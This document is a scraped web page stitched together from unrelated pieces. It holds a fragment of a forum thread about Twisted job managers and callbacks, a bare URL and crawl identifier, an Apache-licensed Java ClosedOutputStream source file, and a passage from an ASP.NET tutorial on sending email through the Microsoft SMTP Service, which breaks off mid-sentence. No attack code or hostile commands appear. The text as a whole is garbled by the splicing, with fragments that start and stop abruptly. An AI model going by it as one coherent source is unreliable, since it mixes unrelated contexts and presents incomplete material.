_tokendoesn’t really tell you what that variable is for. How is a dictionary a token? What about _job_name2loopto remind you what the structure of the dictionary is. Thanks for your reply and the style advice is happily adopted. I am not sure how to avoid the finalize callback. I thought of keeping a property in the countdown class to indicate whether it is done. But I do not know how to make the manager know immediately that the job is done and I do not like the idea to fire a timer to detect the property in the job periodically. I suppose there must be some methods in twisted that can allow two task communicate but I have no idea what they are. May be I thought too complex about this issue but I could not find a way somehow. Could you please give me some indication about this issue? I would make the callback a method on the manager rather than a method on the job. The manager callback would: The other nice thing about that is the manager can catch exceptions from the job and cleanup as well. Like this? I am not sure it is good to make the concrete task aware of a manager exist. In my previous version the task can be used without knowing the manager. The user do not want to use a manager can use the task as well. They can just leave the default finalize parameter as it be. I still cannot grasp the essence behind this style difference. That’s not quite what I meant. I agree that jobs should not know anything about their manager. Let’s make it a little more concrete. Say job objects have two methods: execute_job is_done And the manager has an internal method _execute_job(self, job). The manager would make a looping call like this: LoopingCall(self._execute_job, job). And that method could be something like: Make sense? That’s quite clear. Now I think I know it better. Thanks And this is my final solution: Nice! Hi dave Thanks for the article, I love reading it and it makes all the points quiet clear and simple. I tried the excercise 1 but was not able to get through it, since I am new to Python I would be thankful if you share some code to how actually it has to be done would be very helpful for me to understand. Thanks Bhaarat
http://krondo.com/?p=1333
CC-MAIN-2014-42
refinedweb
4,742
65.83
@rosslaird, seeing the same thing. Interestingly, all the source links on their page now 404. I'd guess it's a mistake... Search Criteria Package Details: dropbox-cli 2015.10.28-2 Dependencies (2) Required by (1) - spacefm-dropbox-plugin (optional) Sources (2) Latest Comments klusark commented on 2017-06-22 05:01 klusark commented on 2017-06-22 04:59 rosslaird commented on 2017-06-22 03:58 Currently getting this: ERROR: Failure while downloading Loading the above URL directly from the browser yields a 404, so I'm guessing the file has been moved. klusark commented on 2017-05-26 23:04 @twa022, I'd rather not make functional changes to the script. twa022 commented on 2017-05-26 22:38 Could you change the patch to this () --- dropbox.py 2011-04-04 20:32:01.000000000 +0200 +++ dropbox.py 2011-04-28 22:55:17.976623103 +0200 @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/python2 # # @@ -610,6 +610,10 @@ def start_dropbox(): db_path = os.path.expanduser(u"~/.dropbox-dist/dropboxd").encode(sys.getfilesystemencoding()) + if not os.path.exists(db_path): + db_path = u"/usr/local/bin/dropbox" + if not os.path.exists(db_path): + db_path = u"/usr/bin/dropbox" if os.access(db_path, os.X_OK): f = open("/dev/null", "w") # we don't reap the child because we're gonna die anyway, let init do it so that /usr/local/bin takes precedence over /usr/bin. (Have dropbox script in /usr/local/bin to export QT_STYLE_OVERRIDE to get proper theming) Thanks! robt commented on 2017-02-01 10:24 Thanks, build now works again. robt commented on 2017-01-29 07:20 The package build is failing with a validation error because dropbox.py has been updated. doronbehar commented on 2016-10-06 16:16 Does anyone is getting this message? ``` Traceback (most recent call last): File "/usr/bin/dropbox-cli", line 826, in <module> @alias('stat') File "/usr/bin/dropbox-cli", line 705, in command meth.__doc__ += u"\nAliases: %s" % ",".join(meth_aliases) TypeError: unsupported operand type(s) for +=: 'NoneType' and 'unicode' ``` kaslusimoes commented on 2015-11-03 14:06 @bluesheep, @Jones: Try cleaning you build directories. It should work by now Jones commented on 2015-11-02 16:13 Same for me: "dropbox.py did not pass the validity check" If they don't put it back soon, I'll upload it to github, as it's GPL.
https://aur.archlinux.org/packages/dropbox-cli/
CC-MAIN-2018-05
refinedweb
400
60.11
: - No one (well, almost no one) apply metadata for the shear joy. It’s always for a purpose. - #1 means that the reason for the system has to be for the end user benefit. What can you do if you have this rich metadata applied? - In order for #2 to come to realization, the metadata has to be present, which means that applying consistent metadata needs to be as easy and ubiquitous as possible.. ‘Tagging’ was fine, ‘metadata’ was OK, at ‘tax: - Terms – A term is the central object in the taxonomy system. It’s the concept itself. It’s very hard to come up with a name for a concept and have it be sufficiently descriptive and not too vague. Term is what we came up with. - Labels – Terms have to be known by a bunch of different names. When someone types "check" it should be the same thing as someone that types "cheque". "USA" and "United States" and "United States of America" are all referring to the same term. We call these names labels. - Default Label – It’s a whole lot easier if one label is the default. You can find it through any of its synonyms, but we’ll display the default label in most circumstances. - Termset – A collection of related terms in a hierarchy is a termset. Things like "locations" and "products". - Term Reuse – This is a key point to the system. If you have two termsets "Capitol Cities" and "Locations", the term "London" and all of it’s synonyms, etc. should be the same in both. We don’t allow a term to have two parents in the same termset, but it can have two parents in different termsets. - Homographs – A homograph is. - Multiple language support – A given term has a bunch of meaning associated with it. The translations belong to the term in the same way that synonyms do. If a term doesn’t have a translation, we use the default language. - Groups – Groups in the taxonomy system are simply collections of termsets that share a common security assignment. Termsets and terms aren’t ACL’d, groups are. - Deprecated terms – if a term shouldn’t be used any more, it can be deprecated. This doesn’t remove it from the system, you just can’t apply it to new content moving forward. - Terms that are unavailable for tagging – this is slightly different from deprecated terms. A deprecated term is deprecated in all occurrences in the taxonomy and isn’t shown to the user when tagging. Unavailable terms are only unavailable in a specific termset, and are still displayed when browsing the hierarchy at tagging time. The purpose of this is to allow things to be hierarchical without allowing people to tag with the wrong term. For example, in the Capitol Cities termset, you might have continents in it so that people can find a particular city, but they would be marked as unavailable for tagging (with respect to Capitol Cities) because they should not be selectable at tagging time. - Merging terms – at times, you might get multiple terms in the system that really are the same thing. They might be in the same termset, or they might be in different termsets. When you merge them, you get a single term with all of the properties, and this new term will be reused in all termsets that the original terms existed. - Open Termsets – There are times when a highly managed taxonomy makes sense. You shouldn’t be able to add random countries to the list of known countries. However, you probably don’t want to give taxonomy editing permissions to everyone that is creating a new codeword. Open termsets allow content editors to add new terms to a hierarchy at content authoring time. It’s a bit of a meeting point between bottom up folksonomies and top down taxonomies. - Keywords – The degenerate case of a folksonomy is a simply flat list of strings. They have no extra semantic meaning. This is the enterprise keywords termset. Terms here don’t have a hierarchy, definitions, synonyms or translations. However it is possible to move a keyword into a managed termset and add this additional data. - Local termsets – The taxonomy field type gives you all sorts of useful features, but you probably don’t want "places to order food from" to wind up in your enterprise taxonomy. Local termsets are only visible within a single site collection.: - Termset binding – You can specify what termset a field should be bound to. You can have lots of fields bound to the same termset. When you update the termset, all of the bound fields use the changes immediately. - Path or node display – You can choose to display the default label of the term by itself "Paris" or its path "Europe > France > Paris". - Multi-lingual rendering - If a given term has been translated to a given language, when your UI is set to that language, the term translations are displayed. - Content type syndication – This isn’t a taxonomy feature per se, but it’s part of the enterprise metadata feature set. We allow a term store to have a site collection defined as it’s "hub". On that hub you can publish content types, and these content types will be pushed out to all consuming site collections. This means that in addition to having a consistent vocabulary across your enterprise, you can have a consistent set of content types using all that goodness. - Rich editing – when you are applying a term to an item, you can search across the entire termset (including synonyms) or view the tree itself. It makes it possible to choose from thousands of choices, which would normally break lookup and choice fields. - Editing support in the rich client applications – the document information panel in the Office client applications allows for applying terms. - Offline editing in the rich client applications – when you edit in the rich client applications, a copy of the bound termsets is cached locally. You can tag on the plane. Once data is in SharePoint, other SharePoint features can deliver additional goodness: - Better listview filtering – not only can you filter in the normal "everything with value X" but you can also do inclusive filtering, displaying everything tagged with X or a child of X. - Better metadata navigation behavior – The metadata navigation feature allows you to navigate through libraries using hierarchies other than the folder hierarchy. The termset is one of the allowed hierarchy types, meaning that you can browse your libraries along multiple axes. You can now free your data from the tyranny of the URL or folder namespace. - Routing and policy – The document routing feature can direct your content based on the metadata applied to it. Taxonomy fields can even be used to create folder hierarchies at the routing destination. Retention policies can be driven off of taxonomy fields as well. - File open / save – Can’t remember exactly where your document is stored in a large library? You can use the taxonomy field to filter the open dialog display. Now that we have all that nice consistent metadata on our content, we can do a few more things: - Content by query Web Part enhancements – You can configure the CBQ to filter based on taxonomy fields, including descendent inclusion. - Automatic search refinement – The search system is aware of all taxonomy fields, and if a result set has a sufficient amount of data with the same taxonomy fields, a search refinement will appear, allowing users to filter their data. - Power user profile and social tagging – it doesn’t make much sense to have a corporate taxonomy and then do your social tagging using just string matching. All of the social properties are actually sourced from the taxonomy system, meaning that you won’t get people asking you where a good place to stay in Paris, France when you are an expert on Paris, Texas. Are their plans to expand into the ontology area in the future once people get comfortable with taxonomies? Hierarchies are great but they don't fit all use cases. Ontologies are important and useful for very large organizations. Keep up the great work. Thanks Pat for very interesting story about Taxomony features! We've been using Taxonomy for a while in SharePoint 2010 projects and i can say it is VERY convenient feature. The only downside we've found related with declarative declarations of taxonomy fields. In Schema we have to specify SspId,GroupId,AnchorId, but what if someone deploy Taxonomy store though feacture activation and after this step to create taxonomy fields then the only we've found to create taxonomy fields was using Taxonomy API. You are correct, you need to create taxonomy fields through code, and not through onet.xml. There is a limitation in the current version that makes it impossible to create a taxonomy field any other way. The next blog post should shed some light on this area. Thanks for the post! You mentioned something about overlaying security model with metadata, did it get implemented with SP 2010? I can't find much info on it. Thanks! Thanks for the informative post! You mentioned an interesting feature of overlaying security model with metadata, did this feature get implemented in SharePoint 2010? I can't find much info on it. Thanks! No, unfortunately this version of SharePoint doesn't have the infrastructure for supporting metadata-based ACLs. On the first comment, yes, you need to create the field through code, not xml. The feature xml doesn't work for the taxonomy field. Things like the category field in the enterprise wiki are created through activation code as well. Thanks for the comments, and hope to have some more posts up soon. Pat. Pat this is a great article , very insightful and easy to understand how you have approached various aspects of the MMS. If i could ask a question, while we can secure people from editing term sets, can we apply security to term sets to deny users or groups of users access to certain content….e.g. members of a security group "Human Resources" can only see documents that have the term " Employee Contracts" assigned to them, general users can not see those documents? This article is a few years old now but an excellent introduction to enterprise metadata management. Thanks Pat! Great work!
https://blogs.msdn.microsoft.com/ecm/2010/06/22/introducing-enterprise-metadata-management/
CC-MAIN-2017-09
refinedweb
1,727
63.19
Dino Viehland wrote: > You need to override and call the base __new__ instead of __init__. .NET has a simpler construction model than Python does and __new__ is what best corresponds to .NET constructors. > > class Derived(Test.Base): > def __new__(cls, i): > return Test.Base.__new__(cls, i) > > d = Derived() > Won't that still blow up? What will .NET use for i in the constructor if you don't provide an argument? Michael > > From: users-bounces at lists.ironpython.com [mailto:users-bounces at lists.ironpython.com] On Behalf Of Zach Crowell > Sent: Friday, August 21, 2009 4:39 PM > To: users at lists.ironpython.com > Subject: [IronPython] Constructors & inheriting from standard .NET classes > > I am unable to inherit from .NET classes which do not define a parameterless constructor. Is this expected behavior? Is there another way to make this inheritance work? > > Here's a simple case. > > using System; > > namespace Test > { > public class Base > { > public Base(int i) > { > } > } > } > > import clr > clr.AddReference('Test') > import Test > > class Derived(Test.Base): > def __init__(self): > pass > > d = Derived() > > Traceback (most recent call last): > File "d:\tmp\class.py", line 9, in d:\tmp\class.py > TypeError: Derived() takes exactly 2 arguments (1 given) > _______________________________________________ > Users mailing list > Users at lists.ironpython.com > > --
https://mail.python.org/pipermail/ironpython-users/2009-August/011101.html
CC-MAIN-2018-26
refinedweb
208
62.14
In my first and second post on using WinRT in a desktop app, we’ve used the raw API and then WRL to create and access WinRT objects. It would be easier to access WinRT using the new C++/CX extensions. Can we do that from a desktop app? Let’s give it a try. We’ll start with a regular Win32 Console application project. The first thing we need to do is to enable the C++/CX extensions. Open project properties and navigate to the C/C++ / General node and set “Consume Windows Runtime Extension” to Yes: Building the project now causes the compiler to complain that a certain setting (minimal rebuild) is incompatible with C++/CX, so we have to disable it. Open project properties again and navigate to C/C++ / Code Generation and disable minimal rebuild: Building the project now still fails with an error that says: “could not find assembly ‘platform.winmd’: please specify the assembly search path using /AI or by setting the LIBPATH environment variable”. Clearly, it wants the platform.winmd metadata file. We can find it in the directory like this: C:\Program Files (x86)\Microsoft Visual Studio 11.0\VC\vcpackages. Trying to use this folder with a #using statement (with platform.winmd as suffix) has no effect (for some reason). The way to fix this is to go to project properties again, find the C/C++ / General node and add the folder to the “Additional #using Directories” value: Building the project now fails again, for the same reason, now looking for another file, windows.winmd (that references the entire WinRT API). We need to add the folder this one is found (C:\Program Files (x86)\Windows Kits\8.0\References\CommonConfiguration\Neutral) to the same value after a semicolon. Now the project finally builds successfully, but the compiler issues a warning, suggesting we replace the classic main() function with a one that uses WinRT types. Let’s do that: using namespace Platform; int main(Array<String^>^ args) { All that’s left to do now is use C++/CX as usual. Here’s an example with the (now classic) Calendar: #include <iostream> using namespace std; using namespace Windows::Globalization; using namespace Platform; int main(Array<String^>^ args) { auto calendar = ref new Calendar; calendar->SetToNow(); wcout << "It's now " << calendar->HourAsPaddedString(2)->Data() << L":" << calendar->MinuteAsPaddedString(2)->Data() << L":" << calendar->SecondAsPaddedString(2)->Data() << endl; return 0; } Astute readers may wonder where is the WinRT initialization (RoInitialize)? Apparently, this happens automatically when we switch to a WinRT-based main. Switching back to the classic main() throws an exception at runtime, as WinRT is not initialized. We can call RoInitialize() explictly to mitigate that. In the above code, what apartment is selected for the current thread? We can check that with an API introduced back in Windows 7 (for COM) that allows querying the current apartment the thread is in, CoGetApartmentType: APTTYPE at; APTTYPEQUALIFIER atq; ::CoGetApartmentType(&at, &atq); Looking at the result, it’s the multithreaded apartment. So, there you have it. WinRT from a desktop app. In fact, in the recent documentation refresh, WinRT types are specifically documented as being able or unable to run in a desktop app. Calendar is one that can. And a lot others can. The more I work with WinRT, the more I feel WinRT is a better COM – it’s the way COM should have been back in the day. Better late then never! Some things are missing, though. When creating a WinRT Component DLL, it does not implement DllRegisterServer, so we can’t automatically register it (via RegSvr32.exe) for desktop app use. For a Store app, that’s not a problem, because the App manifest indicates external dependencies, but desktop apps have no such facility. If it did, we were almost in COM heaven. Source C++/CX Demo Great article! It’s very sad that we did not ship any Visual Studio templates that sets this up for you, but there is one available now that you can download from the “Extensions and Updates” in Visual Studio – search the online gallery for “CxxWinRTTemplate”. Thanks Sridhar! One comment – in addition to the main format with the (Array ) arguments, you can also use a traditional int main(…) and adorn it with the [Platform::MTAThread] attribute. The advantage of doing either of these rather than calling RoInitialize explicitly in main() is that the CRT will ensure that WinRT is initialized BEFORE running any user-defined global constructors, and uninitialized AFTER any user-defined global destructors. This allows you to do a global: SomeRefClass^ g_r = ref new SomeRefClass(); This is really only for EXE’s. The traditional DLLMain issues remain in WinRT unfortunately :(. – Deon Brewis Microsoft Visual C++ Development Team Thank you for that, Deon! Great article. Could we publish this app on windows 7 or vista?Does it work? Thanks alot. Nope. This only works on Windows 8. I’d like to add one note that I had some trouble with. You may get errors akin to “Platform::Object::Object()” could not be imported because it was already defined. You may see this on an array of type definitions. This will be accompanied by error code, c2535. You may also see, “use of this type requires a reference to assembly ‘mscorlib'”. Accompanied by error code C3624. If you see these errors, you’re Visual Studio tools are incompatible with the WinRT components you are targeting. I also believe this can arise from a bug in early versions of VS2012. Ensure your version of Visual Studio is compatible with the version of Windows you are targeting. If it is, ensure you’re version of VS is up to date. Or you’ll spend two days chasing phantoms, like I just did. Just as a note, it is better to use Visual Studio macros to specify the paths to the metadata directories. For platform.winmd, if you use $(VCInstallDir)vcpackages, then if your solution changes Visual Studio version the reference won’t break. Similarly for windows.winmd, you can use $(WindowsSDKDir)UnionMetadata Thanks! Works as expected for Windows 10 UWPlskseyev as well. I’ve taken the liberty to republish the recipe here:
http://blogs.microsoft.co.il/pavely/2012/09/29/using-ccx-in-desktop-apps/?replytocom=1329400
CC-MAIN-2019-35
refinedweb
1,031
56.45
jqGrid JSON Java Model I've been using the JQuery plugin jqGrid for several months now. I've been really pleased with it. Up to this point, due to laziness, I've been building my JSON string manually using StringBuilder. Tonight I decided it was time to make this easier. jqGrid accepts different forms of data to represent the grid. I prefer to use JSON because its very light weight and transforming Java objects to JSON is a light weight task. Here is an example of a JSON string used by jqGrid. It is very simple. It only contains two columns of data and a handful of rows. {"page":"1","records":5,"rows": [ {"cell":["Blue","This is blue"],"id":1}, {"cell":["Green","This is green"],"id":2}, {"cell":["Re","This is red"],"id":3}, {"cell":["Black","This is Black"],"id":4}, {"cell":["Purple","This is purple"],"id":5} ],"total":"1"} To model this string in java I had to create two objects. JQGridJSONModel.java and JQGridRow.java. See the code below. public class JQGridJSONModel { private String page; private String total; private Integer records; private List<JQGridRow> rows; // getters and setters omitted } public class JQGridRow { private Integer id; private List<String> cell; // getters and setters omitted } Using these classes is quite simple. To generate the JSON string above I have a Color class that contains an id, name, and description. Once I retrieve the list from the database I do the following. JQGridJSONModel json = new JQGridJSONModel(); json.setPage("1"); json.setRecords(colors.size()); json.setTotal("1"); List<JQGridRow> rows = new ArrayList<JQGridRow>(); for (Color c : colors) { JQGridRow row = new JQGridRow(); row.setId(c.getId()); List<String> cells = new ArrayList<String>(); cells.add(c.getName()); cells.add(c.getDescription()); row.setCell(cells); rows.add(row); } json.setRows(rows); Then just use your favorite JSON serializer to generate your JSON string. Just make sure you are able to exclude the class parameter that generally gets thrown into the serialization process. I really like FlexJSON. JSONSerializer serializer = new JSONSerializer(); String jsonResult = serializer.exclude("*.class").deepSerialize(json); That's it. Feel free to do with this as you wish
http://www.greggbolinger.com/blog/2008/04/14/1208228820000.html
crawl-002
refinedweb
354
50.73
I Store at State Your Name Please. After having done this, I got the great feedback that it really would be preferable for the app to support panning the map via Narrator’s scroll gestures, rather than having to interact with the four explicit panning buttons that I’d added. It turned out this was really easy for me to implement. All I had to do was add support for the UI Automation Scroll Pattern to my custom AutomationPeer which provides the accessibility support for my custom control hosting the map control. By doing this, Narrator would be told that the UI element that it’s interacting with can be scrolled, and Narrator could ask the element to scroll in whatever direction that the user wants to pan. There are three steps to adding support for the UIA Scroll Pattern to my custom AutomationPeer. 1. Have the AutomationPeer derive from IScrollProvider. 2. Implement the members of iScrollProvider. 3. Override my custom AutomationPeer's GetPatternCore() method to provide UIA clients with an object which supports IScrollProvider. Note that for this experiment I only implemented IScrollProvider to a point where my app’s map could be scrolled via Narrator’s touch gestures. If this was a shipping app, I’d complete the IScrollProvider implementation. The code snippets below show how I updated my custom AutomationPeer to allow Narrator to scroll the map. // Add support for the UI Automation Scroll Pattern to the custom control // which hosts the Map control. class CustomAutomationPeer : FrameworkElementAutomationPeer, IScrollProvider { // When UIA asks this custom AutomationPeer for an object which implements // the Scroll Pattern, return the peer itself. protected override object GetPatternCore(PatternInterface patternInterface) { if (patternInterface == PatternInterface.Scroll) { return this; } return base.GetPatternCore(patternInterface); } // Now implement the Scroll Pattern's properties and methods. // Say that the element can scroll both horizontally and vertically. public bool VerticallyScrollable { get { return true; } } public bool HorizontallyScrollable { get { return true; } } // Vertical scrolling extends from the North Pole to the South Pole. (The user cannot // pan the map beyond the poles.) So consider a scroll position of 0% to be the South // Pole and 100% to be the North Pole. public double VerticalScrollPercent { get { // Convert the map center's latitude into the appropriate scroll position. // Future: Using the center of the map means that in practice the user // nevers actually reaches 0% or 100%. (Instead the scroll is limited // to 3% to 97%.) Consider changing this such that from the user's // perspective, the scroll is between 0% and 100%. return (((mapContainer.MapControl.Center.Latitude + 90.0) * 5.0) / 9.0); } } // Horizontal scrolling is effectively infinite, because the map can be panned // left and right forever. As such, we cannot return a meaningful percentage // to UIA for the current horizontal scroll percentage. If we were to consider // some particular point as both 0% and 100%, (eg the International Date Line,) // then Narrator would not allow the user to scroll beyond that, and this app // wants to allow infinite panning. public double HorizontalScrollPercent { get { // Return a value such that Narrator will always allow left and right scrolling, // (despite the value being meaningless to the user.) return 1; } } // A UIA client has programmatically requested that the element scroll. public void Scroll(ScrollAmount horizontalAmount, ScrollAmount verticalAmount) { // The "PanType" here is an app-specific type used as part of this // custom AutomationPeer communicating with the custom control // which hosts the map control. PanType panType = PanType.panNone; // FUTURE: Requests for small and large scrolls result in the // same pan distance on the map. Update this to have a large // scroll pan further than a small scroll. if ((horizontalAmount == ScrollAmount.LargeIncrement) || (horizontalAmount == ScrollAmount.SmallIncrement)) { panType = PanType.panRight; } else if ((horizontalAmount == ScrollAmount.LargeDecrement) || (horizontalAmount == ScrollAmount.SmallDecrement)) { panType = PanType.panLeft; } else if ((verticalAmount == ScrollAmount.LargeIncrement) || (verticalAmount == ScrollAmount.SmallIncrement)) { panType = PanType.panDown; } else if ((verticalAmount == ScrollAmount.LargeDecrement) || (verticalAmount == ScrollAmount.SmallDecrement)) { panType = PanType.panUp; } if (panType != PanType.panNone) { // Now ask the custom control hosting the map control to pan // the map in the appropriate direction. mapContainer.ScrollMap(panType); } } // Future: Implement the following... public double VerticalViewSize { get; set; } public double HorizontalViewSize { get; set; } public void SetScrollPercent(double horizontalPercent, double verticalPercent) { } And this is the method that I added to another class in my app, which gets called by the custom AutomationPeer when the map is to be panned in response to a request to scroll via UIA. public void ScrollMap(PanType type) { // Get the current lat/long of the center of the map. Location center = new Location(_map.Center); // Depending on the direction of the pan, move the center to // be at the current bounds of the map view. switch (type) { case PanType.panRight: center.Longitude = _map.Bounds.East; break; case PanType.panLeft: center.Longitude = _map.Bounds.West; break; case PanType.panUp: center.Latitude = _map.Bounds.North; break; case PanType.panDown: center.Latitude = _map.Bounds.South; break; } // Now change the view as required, and request no animation of the view change. _map.SetView(center, TimeSpan.Zero); } Once I’d added the above code, I could use the Inspect SDK tool to verify that the UI element did declare itself to support the UIA Scroll Pattern as expected. Figure 1. Inspect showing that the UI element's IsScrollPatternAvailable property is true, and the Scroll Pattern's properties and methods are all exposed. Now that Narrator's 2-finger scroll gestures can be used at the app to pan the map, I removed the four pan-related buttons that I'd added to the previous version of the app. And to tidy things up further, I also removed my own Zoom In and Zoom Out buttons too. I replaced the use of my own Zoom In and Zoom Out buttons with use of the buttons provided by the Map control itself. The map control has a ShowNavigationBar property, which when true, means that the map control will present Zoom In and Zoom Out buttons that the Narrator user can interact with. As it happens, the visibility of the map control's Zoom In and Zoom Out buttons is tied with the visibility of a few other buttons which the user might not be interested in. (These being the Show Traffic and View Mode buttons.) Also, when a single-finger swipe gesture is used to reach the Zoom In and Zoom Out buttons, the user also reaches a nameless text element inside the Zoom In and Zoom Out buttons. So all these additional elements have to be ignored by the user. Using the map control's built-in Zoom In and Zoom Out buttons still beats supporting my own buttons for zooming. One thing I'm keen on is that the app is useful to people who don't use Narrator and those who do, and the app does not have an explicit mode for Narrator use. While this requirement has been met, the options in the app are rather confusing now. For example, when Narrator's not running, the map control's Zoom In and Zoom out buttons appear when the "Show zoom buttons" is checked, but the buttons can't be interacted with unless the "Enable zoom and pan" option is also set. So at some point I'll probably try to clean up the options a bit to make it clearer as to exactly what to expect when certain options are checked. Overall I'm really pleased how easy it was to update the app such that the map can be panned via Narrator's 2-finger scroll gesture.
http://blogs.msdn.com/b/winuiautomation/archive/2014/06/15/updating-the-explorable-map-to-add-support-for-scrolling-with-a-screen-reader.aspx
CC-MAIN-2015-27
refinedweb
1,243
55.54
panda3d.core.AsyncTaskSequence¶ from panda3d.core import AsyncTaskSequence - __init__(name: str) → None setRepeatCount(repeat_count: int) → None¶ Sets the repeat count of the sequence. If the count is 0 or 1, the sequence will run exactly once. If it is greater than 0, it will run that number of times. If it is negative, it will run forever until it is explicitly removed. getRepeatCount() → int¶ Returns the repeat count of the sequence. See setRepeatCount(). getCurrentTaskIndex() → size_t¶ Returns the index of the task within the sequence that is currently being executed (or that will be executed at the next epoch). - Return type size_t
https://docs.panda3d.org/1.10/python/reference/panda3d.core.AsyncTaskSequence
CC-MAIN-2020-05
refinedweb
101
59.3
.IOException; 020 import java.io.OutputStream; 021 022 /** 023 * Closed output stream. This stream throws an exception on all attempts to 024 * write something to the stream. 025 * <p> 026 * Typically uses of this class include testing for corner cases in methods 027 * that accept an output stream and acting as a sentinel value instead of 028 * a {@code null} output stream. 029 * 030 * @version $Id: ClosedOutputStream.java 1307459 2012-03-30 15:11:44Z ggregory $ 031 * @since 1.4 032 */ 033 public class ClosedOutputStream extends OutputStream { 034 035 /** 036 * A singleton. 037 */ 038 public static final ClosedOutputStream CLOSED_OUTPUT_STREAM = new ClosedOutputStream(); 039 040 /** 041 * Throws an {@link IOException} to indicate that the stream is closed. 042 * 043 * @param b ignored 044 * @throws IOException always thrown 045 */ 046 @Override 047 public void write(int b) throws IOException { 048 throw new IOException("write(" + b + ") failed: stream is closed"); 049 } 050 051 }
http://commons.apache.org/io/api-release/src-html/org/apache/commons/io/output/ClosedOutputStream.html#line.33
crawl-003
refinedweb
149
64.3
There are several situations in which you will need to send email messages from your ASP.NET applications. For example, you might want to send a confirmation message to a new user after the user has registered. Or, you might want to automatically send a document to a user as a mail attachment. The ASP.NET Framework includes two classes for sending email: the SmtpMail class and the MailMessage class. These classes were designed to work with the local Microsoft SMTP Service (included as a component of Windows 2000 and Windows XP Professional) or any other email server on your network. In the following sections, you'll be provided with an overview of the Microsoft SMTP Service. Next , you'll learn how to send a simple email message with the SMTP Service. Finally, more advanced topics, such as sending email with attachments and sending HTML email are discussed. The Microsoft SMTP Service does the basic job of sending and retrieving email in accordance with the Simple Mail Transport Protocol (SMTP). In some ways it is very limited. The service does not support the Post Office Protocol (POP). This means that you cannot use the service to create mailbox accounts for multiple users or retrieve email from the service using an email client, such as Outlook or Eudora. If you need to create a full-blown email system that goes beyond support for basic SMTP, you will need to invest in additional software, such as Microsoft Exchange Server or Software.com's Post.Office (see). On the positive side, the Microsoft SMTP Service is valuable for sending automated messages from your Web site. The service can support sending thousands of email messages a day. For example, you can use it to send automatic notification messages to the users of your Web site. To check whether the SMTP Service is installed and running on your server, open the Internet Services Manager and see whether an icon labeled Default SMTP Virtual Server is listed beneath the name of your server (see Figure 26.1). If the service is installed but not running, start the service by selecting Action, Start. A single computer can have multiple SMTP Virtual Servers. Each SMTP Virtual Server is identified by an IP address and domain name. An SMTP Virtual Server can contain one default local domain and zero or more alias domains. When the SMTP Service is installed, a single default local domain is created. The name of the default local domain determines how the service delivers messages. If the service receives an email message that is addressed to the same domain as the default local domain, it is delivered locally; otherwise , the service attempts to send it somewhere else. NOTE The name of the default local domain is determined by the name designated on the DNS tab for the TCP/IP protocol in the Network application in the Control Panel. You can create multiple SMTP Virtual Servers on the same server. This is useful when you need to host completely different Web sites on the same computer. Each SMTP Virtual Server can handle email sent to different IP addresses or domain names . To create a new SMTP Virtual Server, right-click on the icon labeled Default SMTP Virtual Server and choose New, Virtual Server. Finally, you can optionally create alias domains for a single SMTP Virtual Server. Alias domains are useful when your Web site has multiple domain names that point to the same site. When an email message is sent to an alias domain, the message is treated as if it were sent to the default local domain. To create an alias domain, right-click on the icon labeled Domains and choose New, Domain. These additional alias domains must all share the same IP address and Drop directory (see the next section, "How the Microsoft SMTP Service Works") as the default local domain. You can monitor the performance of the SMTP Service by examining its log files. By default, the service keeps a log of its activity in the \WINNT\System32\LogFiles directory. This directory can be changed by clicking the SMTP Virtual Server's property sheet and editing the entry labeled Log File Directory. You can open and examine the SMTP Service's log files in any standard text editor such as Notepad. From a user's perspective, the SMTP Service is a simple component. The service uses two main directories, named Pickup and Drop, to process email. Both of these directories are located, by default, under the InetPub\MailRoot directory. The Pickup directory is used to send email. The service constantly monitors the Pickup directory for new email messages. Whenever it finds an email message, the service attempts to send it. If the service is unable to immediately deliver the message, it is kept in the Queue directory while the service attempts to keep delivering the message. If the email message cannot be delivered and cannot be returned to the sender, the message is moved to the Badmail directory. The Drop directory is used to receive email. When email messages are received by the SMTP Service, the service writes out the messages to the Drop directory. It doesn't do anything else with them; they just stay there. Again, the Microsoft SMTP Service does not support multiple mailboxes. The email messages in these two directories are nothing more than text files. For example, you can send an email message by opening Notepad, entering the following text, and saving the file in the Pickup directory ( Inputpub\mailroot\pickup ): To: Webmaster@Superexpert.com From: someone@somewhere.com Subject: Testing SMTP Service Here is the message! As soon as you save the file, the file should disappear from the Pickup directory because the SMTP Service is attempting to send it. In theory, you could use the classes from the System.IO namespace from within your ASP.NET pages to write messages to the Pickup directory and send email (see Chapter 25, "Working with the File System"). In practice, however, this is not a good strategy. You can send email more reliably and easily by using the SmtpMail and MailMessage classes. You can use the SmtpMail class to send an email message from within an ASP.NET page with a single line of code. To send an email with the SmtpMail class, use the Send method: SmtpMail.Send( _ "jane@somewhere.com", _ "webmaster@Superexpert.com", _ "Testing Mail!", _ "Just sending a test message!" ) This statement sends an email message from jane@somewhere.com to webmaster@Superexpert.com. The subject of the message is Testing Mail! and the body of the message is Just sending a test message! . Both the SmtpMail and MailMessage classes are found in the System.Web.Mail namespace. Before you can use these classes, you must import the System.Web.Mail namespace into your page. By default, the SmtpMail class uses the local email server to send email messages. You can use another email server on your network by setting the shared SmtpServer property of the SmtpMail class before sending a message. For example, to use the email server located at MyEmailServer.com, you would use the statement: SmtpMail.SmtpServer = "MyEmailServer.com" The ASP.NET page in Listing 26.1 contains a simple form that enables you to send any email message (see Figure 26.2). <%@ Import Sub Button_Click( s As Object, e As EventArgs ) SmtpMail.Send( _ mailfrom.Text, _ mailto.Text, _ mailsubject.Text, _ mailbody.Text ) End Sub </Script> <html> <head><title>SendMail.aspx</title></head> <body> <h1>Send Mail:</h1> <form runat="Server"> <b>From:</b> <br> <asp:TextBox <p> <b>To:</b> <br> <asp:TextBox <p> <b>Subject:</b> <br> <asp:TextBox <p> <b>Body:</b> <br> <asp:TextBox <p> <asp:Button </form> </body> </html> The C# version of this code can be found on the CD-ROM. When you submit the form in Listing 26.1, the Button_Click subroutine executes. This subroutine grabs all the values entered into the form fields and sends an email message with those values. If you are sending a long message, you will probably need to include line breaks in the message body. By default, an email message does not use HTML, so you cannot use the <BR> or <P> HTML tags to create a line break. To create a line break, use the Visual Basic constant, vbCRLF , which adds a carriage return and line feed. As shown in the previous section, you can use the Send method of the SmtpMail class to send simple email messages. However, if you need to set particular properties of an email message, then you'll need to create an instance of the MailMessage class. The MailMessage class has the following properties: Attachments ” Returns a collection representing all the files attached to the message. Bcc ” Gets or sets the Blind Copy field of the email message. Body ” Gets or sets the body of the email message. BodyEncoding ” Gets or sets a value from the MailEncoding enumeration that specifies the method of encoding the message (possible values are Base64 and UUEncode ). BodyFormat ” Gets or sets a value from the MailFormat enumeration that specifies the format of the body of the message (possible values are Text and Html ). 